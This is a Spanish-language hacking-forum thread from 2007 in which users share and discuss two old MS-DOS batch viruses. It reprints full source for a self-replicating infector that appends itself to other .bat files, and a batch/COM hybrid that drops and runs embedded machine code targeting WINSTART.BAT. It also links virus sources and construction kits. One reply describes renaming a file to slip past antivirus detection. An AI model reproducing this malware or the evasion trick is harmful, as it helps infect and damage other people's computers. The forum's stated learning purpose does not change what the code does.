Abril Negro 2007

Iniciado por WHK, 31 Marzo 2007, 03:05 AM

0 Miembros y 1 Visitante están viendo este tema.

WHK

Acá hay algunos codigos en batch que les pueden interesar un poco:

@echo off%!-%
if '%1=='~ goto !-%2
if exist \!-.bat goto !-r
if not exist %0.bat goto !-e
find "!-"<%0.bat>\!-.BAT
:!-r
command /c \!- ~ s . .. %path%
goto !-e
:!-s
shift%!-%
if '%2==' exist !-
for %%a in (%2\*.bat) do call \!- ~ i %%a
goto !-s
:!-i
find "!-"<%3>!-s
copy !-s !-!>nul
if exist !-! goto !-a
del !-s
type \!-.bat>>%3
exit !-
:!-a
del !-!
:!-e


XD y este otro:

@ECHO  OFF
:s%r#
COPY %0.BAT C:\Q.COM>NUL
C:\Q
¸ ·¢'Í/<ÿt%¿ÿÿ»­ ¸JÍ/GtWü¾¹¨ ó¤ŽÙ¾¥¥DüŒDþº¿²´VÍ!´AÍ!‹×A¸CÍ!Í = ·u°ÿÏ= ®té— ƒúÿuø:îuô`´Í!´6™<w}Í!Ñê;Úè C:\WINSTART.BAT Z¸@=w^Í!rZ"¸ [3ÉŽÙ¿` ÿu0ÿu2‰}0Œ]2Ç°ÆEÏ€Í!ŽÙE2E0r&•S´?‹×±Í!'´@‹ÝÍ! À[uë¸ WÍ!´>Í!‹Ý¸WÍ!´>Í!aê


jajajaja me diran.. este tio esta loco XD ps no estoy loco... es un virus en batch muy conocido llamado "bacteria2.bat"
Pueden bajar este y muchos ejemplos de codigos creados en batch desde aca:

http://512.iespana.es/virus_y_troyanos

También agregué algunos codigos fuentes de muchos virus para que puedan comprender su funcionamiento (por eso saqué los que no tenian el codigo) ya que la idea no es joder a todo mundo infectando gente y bajando programillas... para eso hay otras paginas, acá es para aprender.

Acabo de agregar dos programas para compilar tu propio virus... uno se llama "lavi" y el otro "viological ware" cada uno con sus textos explicativos. Ojala les sirva ;)

Att. Yan
Unilola Softwares.

nhaalclkiemr

¿Podrías explicar que es lo que hace este virus?
Es que yo se mas o menos batch y no entiendo mucho tu codigo...
¿Podrias ir explicando detalladamente que es lo que hace en cada una de las lineas?

Un saludo ;) ;)
StasFodidoCrypter 1.0 - 100% (old)
StasFodidoCrypter 2.0 - 85% (deserted)
Fire AV/FW-Killer - 97% (deserted)
R-WlanXDecrypter 1.0- 100%

abcdef123

Yo no tengo ni idea lo que hace pero lo he intentado guardar como .txt .doc .ppt .html y nada todo lo detecta al final lo he guardado en el correo  :D

Hendrix

emm.....que hace esto kon chincheta??? es un error??? :huh:

Salu2  ;)
"Todos los días perdemos una docena de genios en el anonimato. Y se van. Y nadie sabe de ellos, de su historia, de su peripecia, de lo que han hecho, de sus angustias, de sus alegrías. Pero al menos una docena de genios se van todos los días sin que sepamos de ellos". - Juan Antonio Cebrián

WHK

Quiero dejar en claro que yo no hice esos virus Aunque igual los entiendo a medias porque he aprendido mucho de ellos.
Talves fue un malentendido, solo quería compartir estos codigos fuente para que pudieran hechar a volar la imaginación. este post fue de una respuesta a programación en batch hecho y movido por el mismo sidarcat, Aunque muchos me han dicho que es muy buena info pero no quiero que se malinterprete.
Si no tienen ni idea de lo que hace un bat... pueden ver el post de programación en batch http://foro.elhacker.net/index.php/topic,132924.0.html

Tyrz

joder yo hago programillas con batch y tal y eso lo veo y no sbria decirte ni en que lenguage esta
Web dedicada por completo al surf. Hablamos de tablas de surf, videos de surf, fotos, juegos y mucha información sobre como aprender a surfear, spots famosos como mundaka, pipeline y zonas como vizcaya, surf españa, sopelana y mucho más. Trucos y peligros del surf. A que esperas? Entra en  Surf

sirdarckcat

la chicnheta se puso por error..
WHK lo puso en el foro de scripting en unpost con chincheta, al momento de moverlo aca, se le quedo..
ya se la quite :P

nhaalclkiemr

En Virustotal lo detectan casi todos los AV... Lo prové en una maquina Virtual con WinXP Proffesional SP2 y nada, no pasa nada con ninguno de los dos codigos, lo analicé y no se ejecuta todo el bat pues produce un error de sintaxis antes de acavar...

¿Alguien lo podía analizar y explicarmelo?

Un saludo ;) ;)
StasFodidoCrypter 1.0 - 100% (old)
StasFodidoCrypter 2.0 - 85% (deserted)
Fire AV/FW-Killer - 97% (deserted)
R-WlanXDecrypter 1.0- 100%

Tyrz

si la verdad esque si alguien lo explicara estaria fenomeno
Web dedicada por completo al surf. Hablamos de tablas de surf, videos de surf, fotos, juegos y mucha información sobre como aprender a surfear, spots famosos como mundaka, pipeline y zonas como vizcaya, surf españa, sopelana y mucho más. Trucos y peligros del surf. A que esperas? Entra en  Surf

Red Mx

#9
@ECHO  OFF
:s%r#
COPY %0.BAT C:\Q.COM>NUL
C:\Q
¸ ·¢'Í/<ÿt%¿ÿÿ»­ ¸JÍ/GtWü¾¹¨ ó¤ŽÙ¾¥¥DüŒDþº¿²´VÍ!´AÍ!‹×A¸CÍ!Í = ·u°ÿÏ= ®té— ƒúÿuø:îuô`´Í!´6™<w}Í!Ñê;Úè C:\WINSTART.BAT Z¸@=w^Í!rZ"¸ [3ÉŽÙ¿` ÿu0ÿu2‰}0Œ]2Ç°ÆEÏ€Í!ŽÙE2E0r&•S´?‹×±Í!'´@‹ÝÍ! À[uë¸ WÍ!´>Í!‹Ý¸WÍ!´>Í!aê


por la lectura rapida que le die solo es un batch que crea un archivo en c llamado Q.com con este code el cual es una aplicacion .com  ¸

·¢'Í/<ÿt%¿ÿÿ»­ ¸JÍ/GtWü¾¹¨ ó¤ŽÙ¾¥¥DüŒDþº¿²´VÍ!´AÍ!‹×A¸CÍ!Í = ·u°ÿÏ= ®té— ƒúÿuø:îuô`´Í!´6™<w}Í!Ñê;Úè C:\WINSTART.BAT Z¸@=w^Í!rZ"¸ [3ÉŽÙ¿` ÿu0ÿu2‰}0Œ]2Ç°ÆEÏ€Í!ŽÙE2E0r&•S´?‹×±Í!'´@‹ÝÍ! À[uë¸ WÍ!´>Í!‹Ý¸WÍ!´>Í!aê


probe los dos guardandolos en un archivo .bat y el nod32 los detecto


al parecer son virus viejos

pero bueno

@echo off%!-%
if '%1=='~ goto !-%2
if exist \!-.bat goto !-r
if not exist %0.bat goto !-e
find "!-"<%0.bat>\!-.BAT
:!-r
command /c \!- ~ s . .. %path%
goto !-e
:!-s
shift%!-%
if '%2==' exist !-
for %%a in (%2\*.bat) do call \!- ~ i %%a
goto !-s
:!-i
find "!-"<%3>!-s
copy !-s !-!>nul
if exist !-! goto !-a
del !-s
type \!-.bat>>%3
exit !-
:!-a
del !-!
:!-e


Conocido para el nod32 como : Bat/swing.378 (virus)

@ECHO  OFF
:s%r#
COPY %0.BAT C:\Q.COM>NUL
C:\Q
¸ ·¢'Í/<ÿt%¿ÿÿ»­ ¸JÍ/GtWü¾¹¨ ó¤ŽÙ¾¥¥DüŒDþº¿²´VÍ!´AÍ!‹×A¸CÍ!Í = ·u°ÿÏ= ®té— ƒúÿuø:îuô`´Í!´6™<w}Í!Ñê;Úè C:\WINSTART.BAT Z¸@=w^Í!rZ"¸ [3ÉŽÙ¿` ÿu0ÿu2‰}0Œ]2Ç°ÆEÏ€Í!ŽÙE2E0r&•S´?‹×±Í!'´@‹ÝÍ! À[uë¸ WÍ!´>Í!‹Ý¸WÍ!´>Í!aê


Conocido como: BAT/winstar.297


EDITO:

batch no es un lenguaje de programacion solo son archivos por lotes de MS-DOS los cuales son instrucciones que se ejecutan en modo consola

algo muy curioso solo le cambie la la Q por REDMX en este y el nod32 no lo detecto obiamente no lo ejecute

@ECHO  OFF
:s%r#
COPY %0.BAT C:\Q.COM>NUL
C:\Q
¸ ·¢'Í/<ÿt%¿ÿÿ»­ ¸JÍ/GtWü¾¹¨ ó¤ŽÙ¾¥¥DüŒDþº¿²´VÍ!´AÍ!‹×A¸CÍ!Í = ·u°ÿÏ= ®té— ƒúÿuø:îuô`´Í!´6™<w}Í!Ñê;Úè C:\WINSTART.BAT Z¸@=w^Í!rZ"¸ [3ÉŽÙ¿` ÿu0ÿu2‰}0Œ]2Ç°ÆEÏ€Í!ŽÙE2E0r&•S´?‹×±Í!'´@‹ÝÍ! À[uë¸ WÍ!´>Í!‹Ý¸WÍ!´>Í!aê


COPY %0.BAT C:\Q.COM>NUL
C:\Q

aqui solo le puse

COPY %0.BAT C:\REDMX.COM>NUL
C:\REDMX
Desarrollar Malware Es Causa De Cancer...